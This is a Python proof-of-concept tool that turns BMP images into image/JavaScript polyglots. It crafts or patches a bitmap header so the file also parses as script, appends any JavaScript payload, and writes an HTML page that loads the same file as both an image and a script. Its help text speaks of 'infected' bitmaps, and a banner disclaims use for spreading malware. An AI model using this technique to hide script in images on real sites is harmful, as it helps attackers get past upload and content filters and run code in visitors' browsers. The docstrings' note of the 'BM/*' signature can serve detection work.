1 | #!/usr/bin/env python2 | |
2 | #============================================================================================================# | |
3 | #======= Simply injects a JavaScript Payload into a BMP. ====================================================# | |
4 | #======= The resulting BMP must be a valid (not corrupted) BMP. =============================================# | |
5 | #======= Author: marcoramilli.blogspot.com ==================================================================# | |
6 | #======= Version: PoC (don't even think to use it in development env.) ======================================# | |
7 | #======= Disclaimer: ========================================================================================# | |
8 | #THIS SOFTWARE IS PROVIDED BY THE AUTHOR "AS IS" AND ANY EXPRESS OR | |
9 | #IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED | |
10 | #WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE | |
11 | #DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, | |
12 | #INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES | |
13 | #(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR | |
14 | #SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) | |
15 | #HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, | |
16 | #STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING | |
17 | #IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE | |
18 | #POSSIBILITY OF SUCH DAMAGE. | |
19 | #===========================================================================================================# | |
import argparse
import binascii
import os
22 | ||
23 | #--------------------------------------------------------- | |
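def _hexify(num):
    """
    Convert a non-negative integer to its minimal big-endian byte string.

    The value is formatted with ``%x`` (no fixed width), left-padded with a
    single ``0`` when the digit count is odd, and then decoded from hex.  The
    result is therefore 1 byte for 0..255, 2 bytes for 256..65535, and so on;
    it is a variable-length, big-endian value, not a fixed-width
    little-endian field.

    :param num: integer to encode; negative values are not supported.
    :return: ``bytes`` on Python 3 (``str`` on Python 2).
    :raises: ``binascii.Error`` on Python 3 (``TypeError`` on Python 2) when
        ``num`` is negative, because the leading ``-`` is not a hex digit.
    """
    digits = "%x" % num
    # unhexlify needs an even digit count: pad one leading zero if required.
    if len(digits) % 2:
        digits = "0" + digits
    # binascii.unhexlify gives the same bytes as the Python-2-only
    # str.decode('hex') and also works on Python 3.
    return binascii.unhexlify(digits)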
32 | ||
33 | #--------------------------------------------------------- | |
34 | #Example payload: "var _0xe428=[\""+ b'\x48\x65\x6C\x6C\x6F\x20\x57\x6F\x72\x6C\x64' + "\"] | |
35 | #;alert(_0xe428[0]);" | |
def _generate_and_write_to_file(payload, fname):
    """
    Write a synthetic BMP header followed by ``payload`` to ``fname``.

    The header bytes are the ones from the original layout: the ``BM``
    signature, a file-size field whose first two bytes are ``/*``, zeroed
    reserved/offset fields, ``_hexify(len(payload))`` in the header-size
    slot, fixed 20x20 dimensions, and three palette entries of which the
    last ends in ``*/=1;``.  The payload is appended directly after the
    header.

    A file produced here therefore starts with the bytes ``BM/*`` and has
    ``*/=1;`` immediately before the payload, which is a simple content
    signature to look for when scanning images.

    :param payload: bytes to write after the header (``str`` under Python 2).
    :param fname: path of the file to create; an existing file is truncated.
    :return: always ``True``.
    """
    # Bytes that precede the variable-length header-size field.
    leading = [
        b"\x42\x4D",          # "BM" signature
        b"\x2F\x2A\x00\x00",  # file-size field; first two bytes read as "/*"
        b"\x00\x00\x00\x00",  # reserved
        b"\x00\x00\x00\x00",  # bitmap data offset
    ]
    # Bytes that follow it: dimensions, format fields and the palette.
    trailing = [
        b"\x00\x00\x00\x14",  # width: 20 px
        b"\x00\x00\x00\x14",  # height: 20 px
        b"\x00\x00",          # planes
        b"\x00\x00",          # bits per pixel
        b"\x00\x10\x00\x00",  # compression type
        b"\x00\x00\x00\x00",  # image size
        b"\x00\x00\x00\x01",  # horizontal resolution
        b"\x00\x00\x00\x01",  # vertical resolution
        b"\x00\x00\x00\x00",  # number of colours
        b"\x00\x00\x00\x00",  # number of important colours
        b"\x00\x00\x00\x80",  # palette entry
        b"\x00\x80\xff\x80",  # palette entry
        b"\x80\x00\xff\x2A",  # palette entry; last byte is "*"
        b"\x2F\x3D\x31\x3B",  # "/=1;"
    ]
    header = b"".join(leading) + _hexify(len(payload)) + b"".join(trailing)
    # Header and payload go out as two separate writes, as in the original.
    with open(fname, "wb") as out:
        out.write(header)
        out.write(payload)
    return True
66 | ||
67 | #--------------------------------------------------------- | |
def _generate_launching_page(f):
    """
    Write ``run.html`` in the current directory, referencing ``f`` twice.

    The page loads ``f`` once as an ``<img>`` and once as a ``<script>``.
    The file name is inserted verbatim: nothing is escaped or quoted, so a
    name containing ``"`` or ``<`` lands in the markup unchanged.  The
    output file is always ``run.html`` and is overwritten if present.

    :param f: file name (or relative path) to reference from the page.
    :return: always ``True``.
    """
    # The original literal contained the unrecognised escape ``\>``, which
    # Python keeps as a backslash followed by ``>``; ``\\>`` below yields
    # exactly those two characters.
    template = (
        "\n"
        "<html>\n"
        "<head><title>Opening an image</title> </head>\n"
        "<body>\n"
        '<img src="%s"\\>\n'
        '<script src= "%s"> </script>\n'
        "</body>\n"
        "</html>\n"
    )
    page = template % (f, f)
    # Opened in binary mode as in the original; under Python 2 the str is
    # written as-is.
    with open("run.html", "wb") as html:
        html.write(page)
    return True
86 | ||
87 | #--------------------------------------------------------- | |
def _inject_into_file(payload, fname):
    """
    Rewrite the existing file ``fname`` in place and append ``payload``.

    Three passes over the file, in this order:

    1. read the whole file into memory;
    2. write the same bytes back, then overwrite offsets 2-3 with ``/*``
       (the first two bytes of the BMP file-size field);
    3. append ``\\xFF*/=1;`` followed by ``payload``.

    ``bytes.replace`` is called on the in-memory copy, but its return value
    is not used, so the bytes written back in step 2 are exactly those read
    in step 1 (apart from offsets 2-3).  The original docstring notes that
    an input containing ``\\xFF\\x2A`` might cause issues.

    :param payload: bytes to append (``str`` under Python 2).
    :param fname: path of an existing file; it is modified in place.
    :return: always ``True``.
    """
    # Pass 1: read everything.  The original deliberately keeps separate
    # passes instead of doing the work in memory.
    with open(fname, "r+b") as src:
        content = src.read()
    content.replace(b"\x2A\x2F", b"\x00\x00")  # return value is not used

    # Pass 2: write back, then patch offsets 2-3 to "/*".
    with open(fname, "w+b") as dst:
        dst.write(content)
        dst.seek(2, 0)
        dst.write(b"\x2F\x2A")

    # Pass 3: append the trailer and the payload.
    with open(fname, "a+b") as tail:
        tail.write(b"\xFF\x2A\x2F\x3D\x31\x3B")
        tail.write(payload)
    return True
111 | ||
112 | ||
113 | #--------------------------------------------------------- | |
if __name__ == "__main__":
    # Command line: a file name, a payload string, and an optional flag that
    # selects in-place modification of an existing file instead of
    # generating a new one.
    cli = argparse.ArgumentParser()
    cli.add_argument(
        "filename",
        help="the bmp file name to be generated/or infected",
    )
    cli.add_argument(
        "js_payload",
        help="the payload to be injected. For exmample: \"alert(\"test\");\"",
    )
    cli.add_argument(
        "-i", "--inject-to-existing-bmp",
        action="store_true",
        help="inject into the current bitmap",
    )
    opts = cli.parse_args()

    # Banner text reproduced verbatim; print() form works on both 2 and 3.
    print("""
|======================================================================================================|
| [!] legal disclaimer: usage of this tool for injecting malware to be propagated is illegal. |
| It is the end user's responsibility to obey all applicable local, state and federal laws. |
| Authors assume no liability and are not responsible for any misuse or damage caused by this program |
|======================================================================================================|
""")

    # Either modify the named file in place or create it from scratch, then
    # always emit run.html next to the current working directory.
    writer = _inject_into_file if opts.inject_to_existing_bmp else _generate_and_write_to_file
    writer(opts.js_payload, opts.filename)

    _generate_launching_page(opts.filename)
    print("[+] Finished!")